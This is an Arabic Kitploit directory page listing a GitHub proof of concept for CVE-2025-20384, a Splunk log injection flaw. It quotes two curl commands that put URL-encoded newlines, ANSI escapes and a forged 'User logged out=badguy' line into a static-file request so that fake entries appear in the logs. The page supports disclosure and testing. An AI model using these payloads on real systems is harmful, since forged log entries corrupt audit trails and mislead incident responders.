Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-20384 — إثبات مفهوم يوضح حقن السجلات وتسميمها في Splunk عبر معاملات URL مصممة بعناية، مع تسليط الضوء على مخاطر حقن السجلات وفقًا لـ OWASP. | Kitploit
أدوات/GitHubGitHub/axselll/cve-2025-20384
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليمتحليل السجلات
GitHubaxselll/cve-2025-20384

CVE-2025-20384

إثبات مفهوم يوضح حقن السجلات وتسميمها في Splunk عبر معاملات URL مصممة بعناية، مع تسليط الضوء على مخاطر حقن السجلات وفقًا لـ OWASP.

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SPLUNK CVE-2025-20384

لا أدري، لقد قرأت للتو ما أرسله لي صديقي وبدأت في كتابة بعض أكواد جافا سكريبت العشوائية التافهة

إثبات مفهوم من نوع حقن/تزوير/تسميم/إخفاء السجل

يرجى قراءة هذه المقالة OWASP Log Injection

TL;DR

  • ابحث عن ملف ثابت، وقم بتمريره وإلحاق معامل عشوائي به

  • لذا، أقوم بتمرير curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" OR curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"

  • إذا رأيت سطرًا جديدًا عشوائيًا يظهر، فهذا تسميم، قد تشعر أنه لا بأس به لأنه مجرد تسميم "عادي" لكنه قد يكون مزعجًا إذا كان مستهدفًا بشدة.

مرجع

رابط سجل CVE

تنزيل الأداة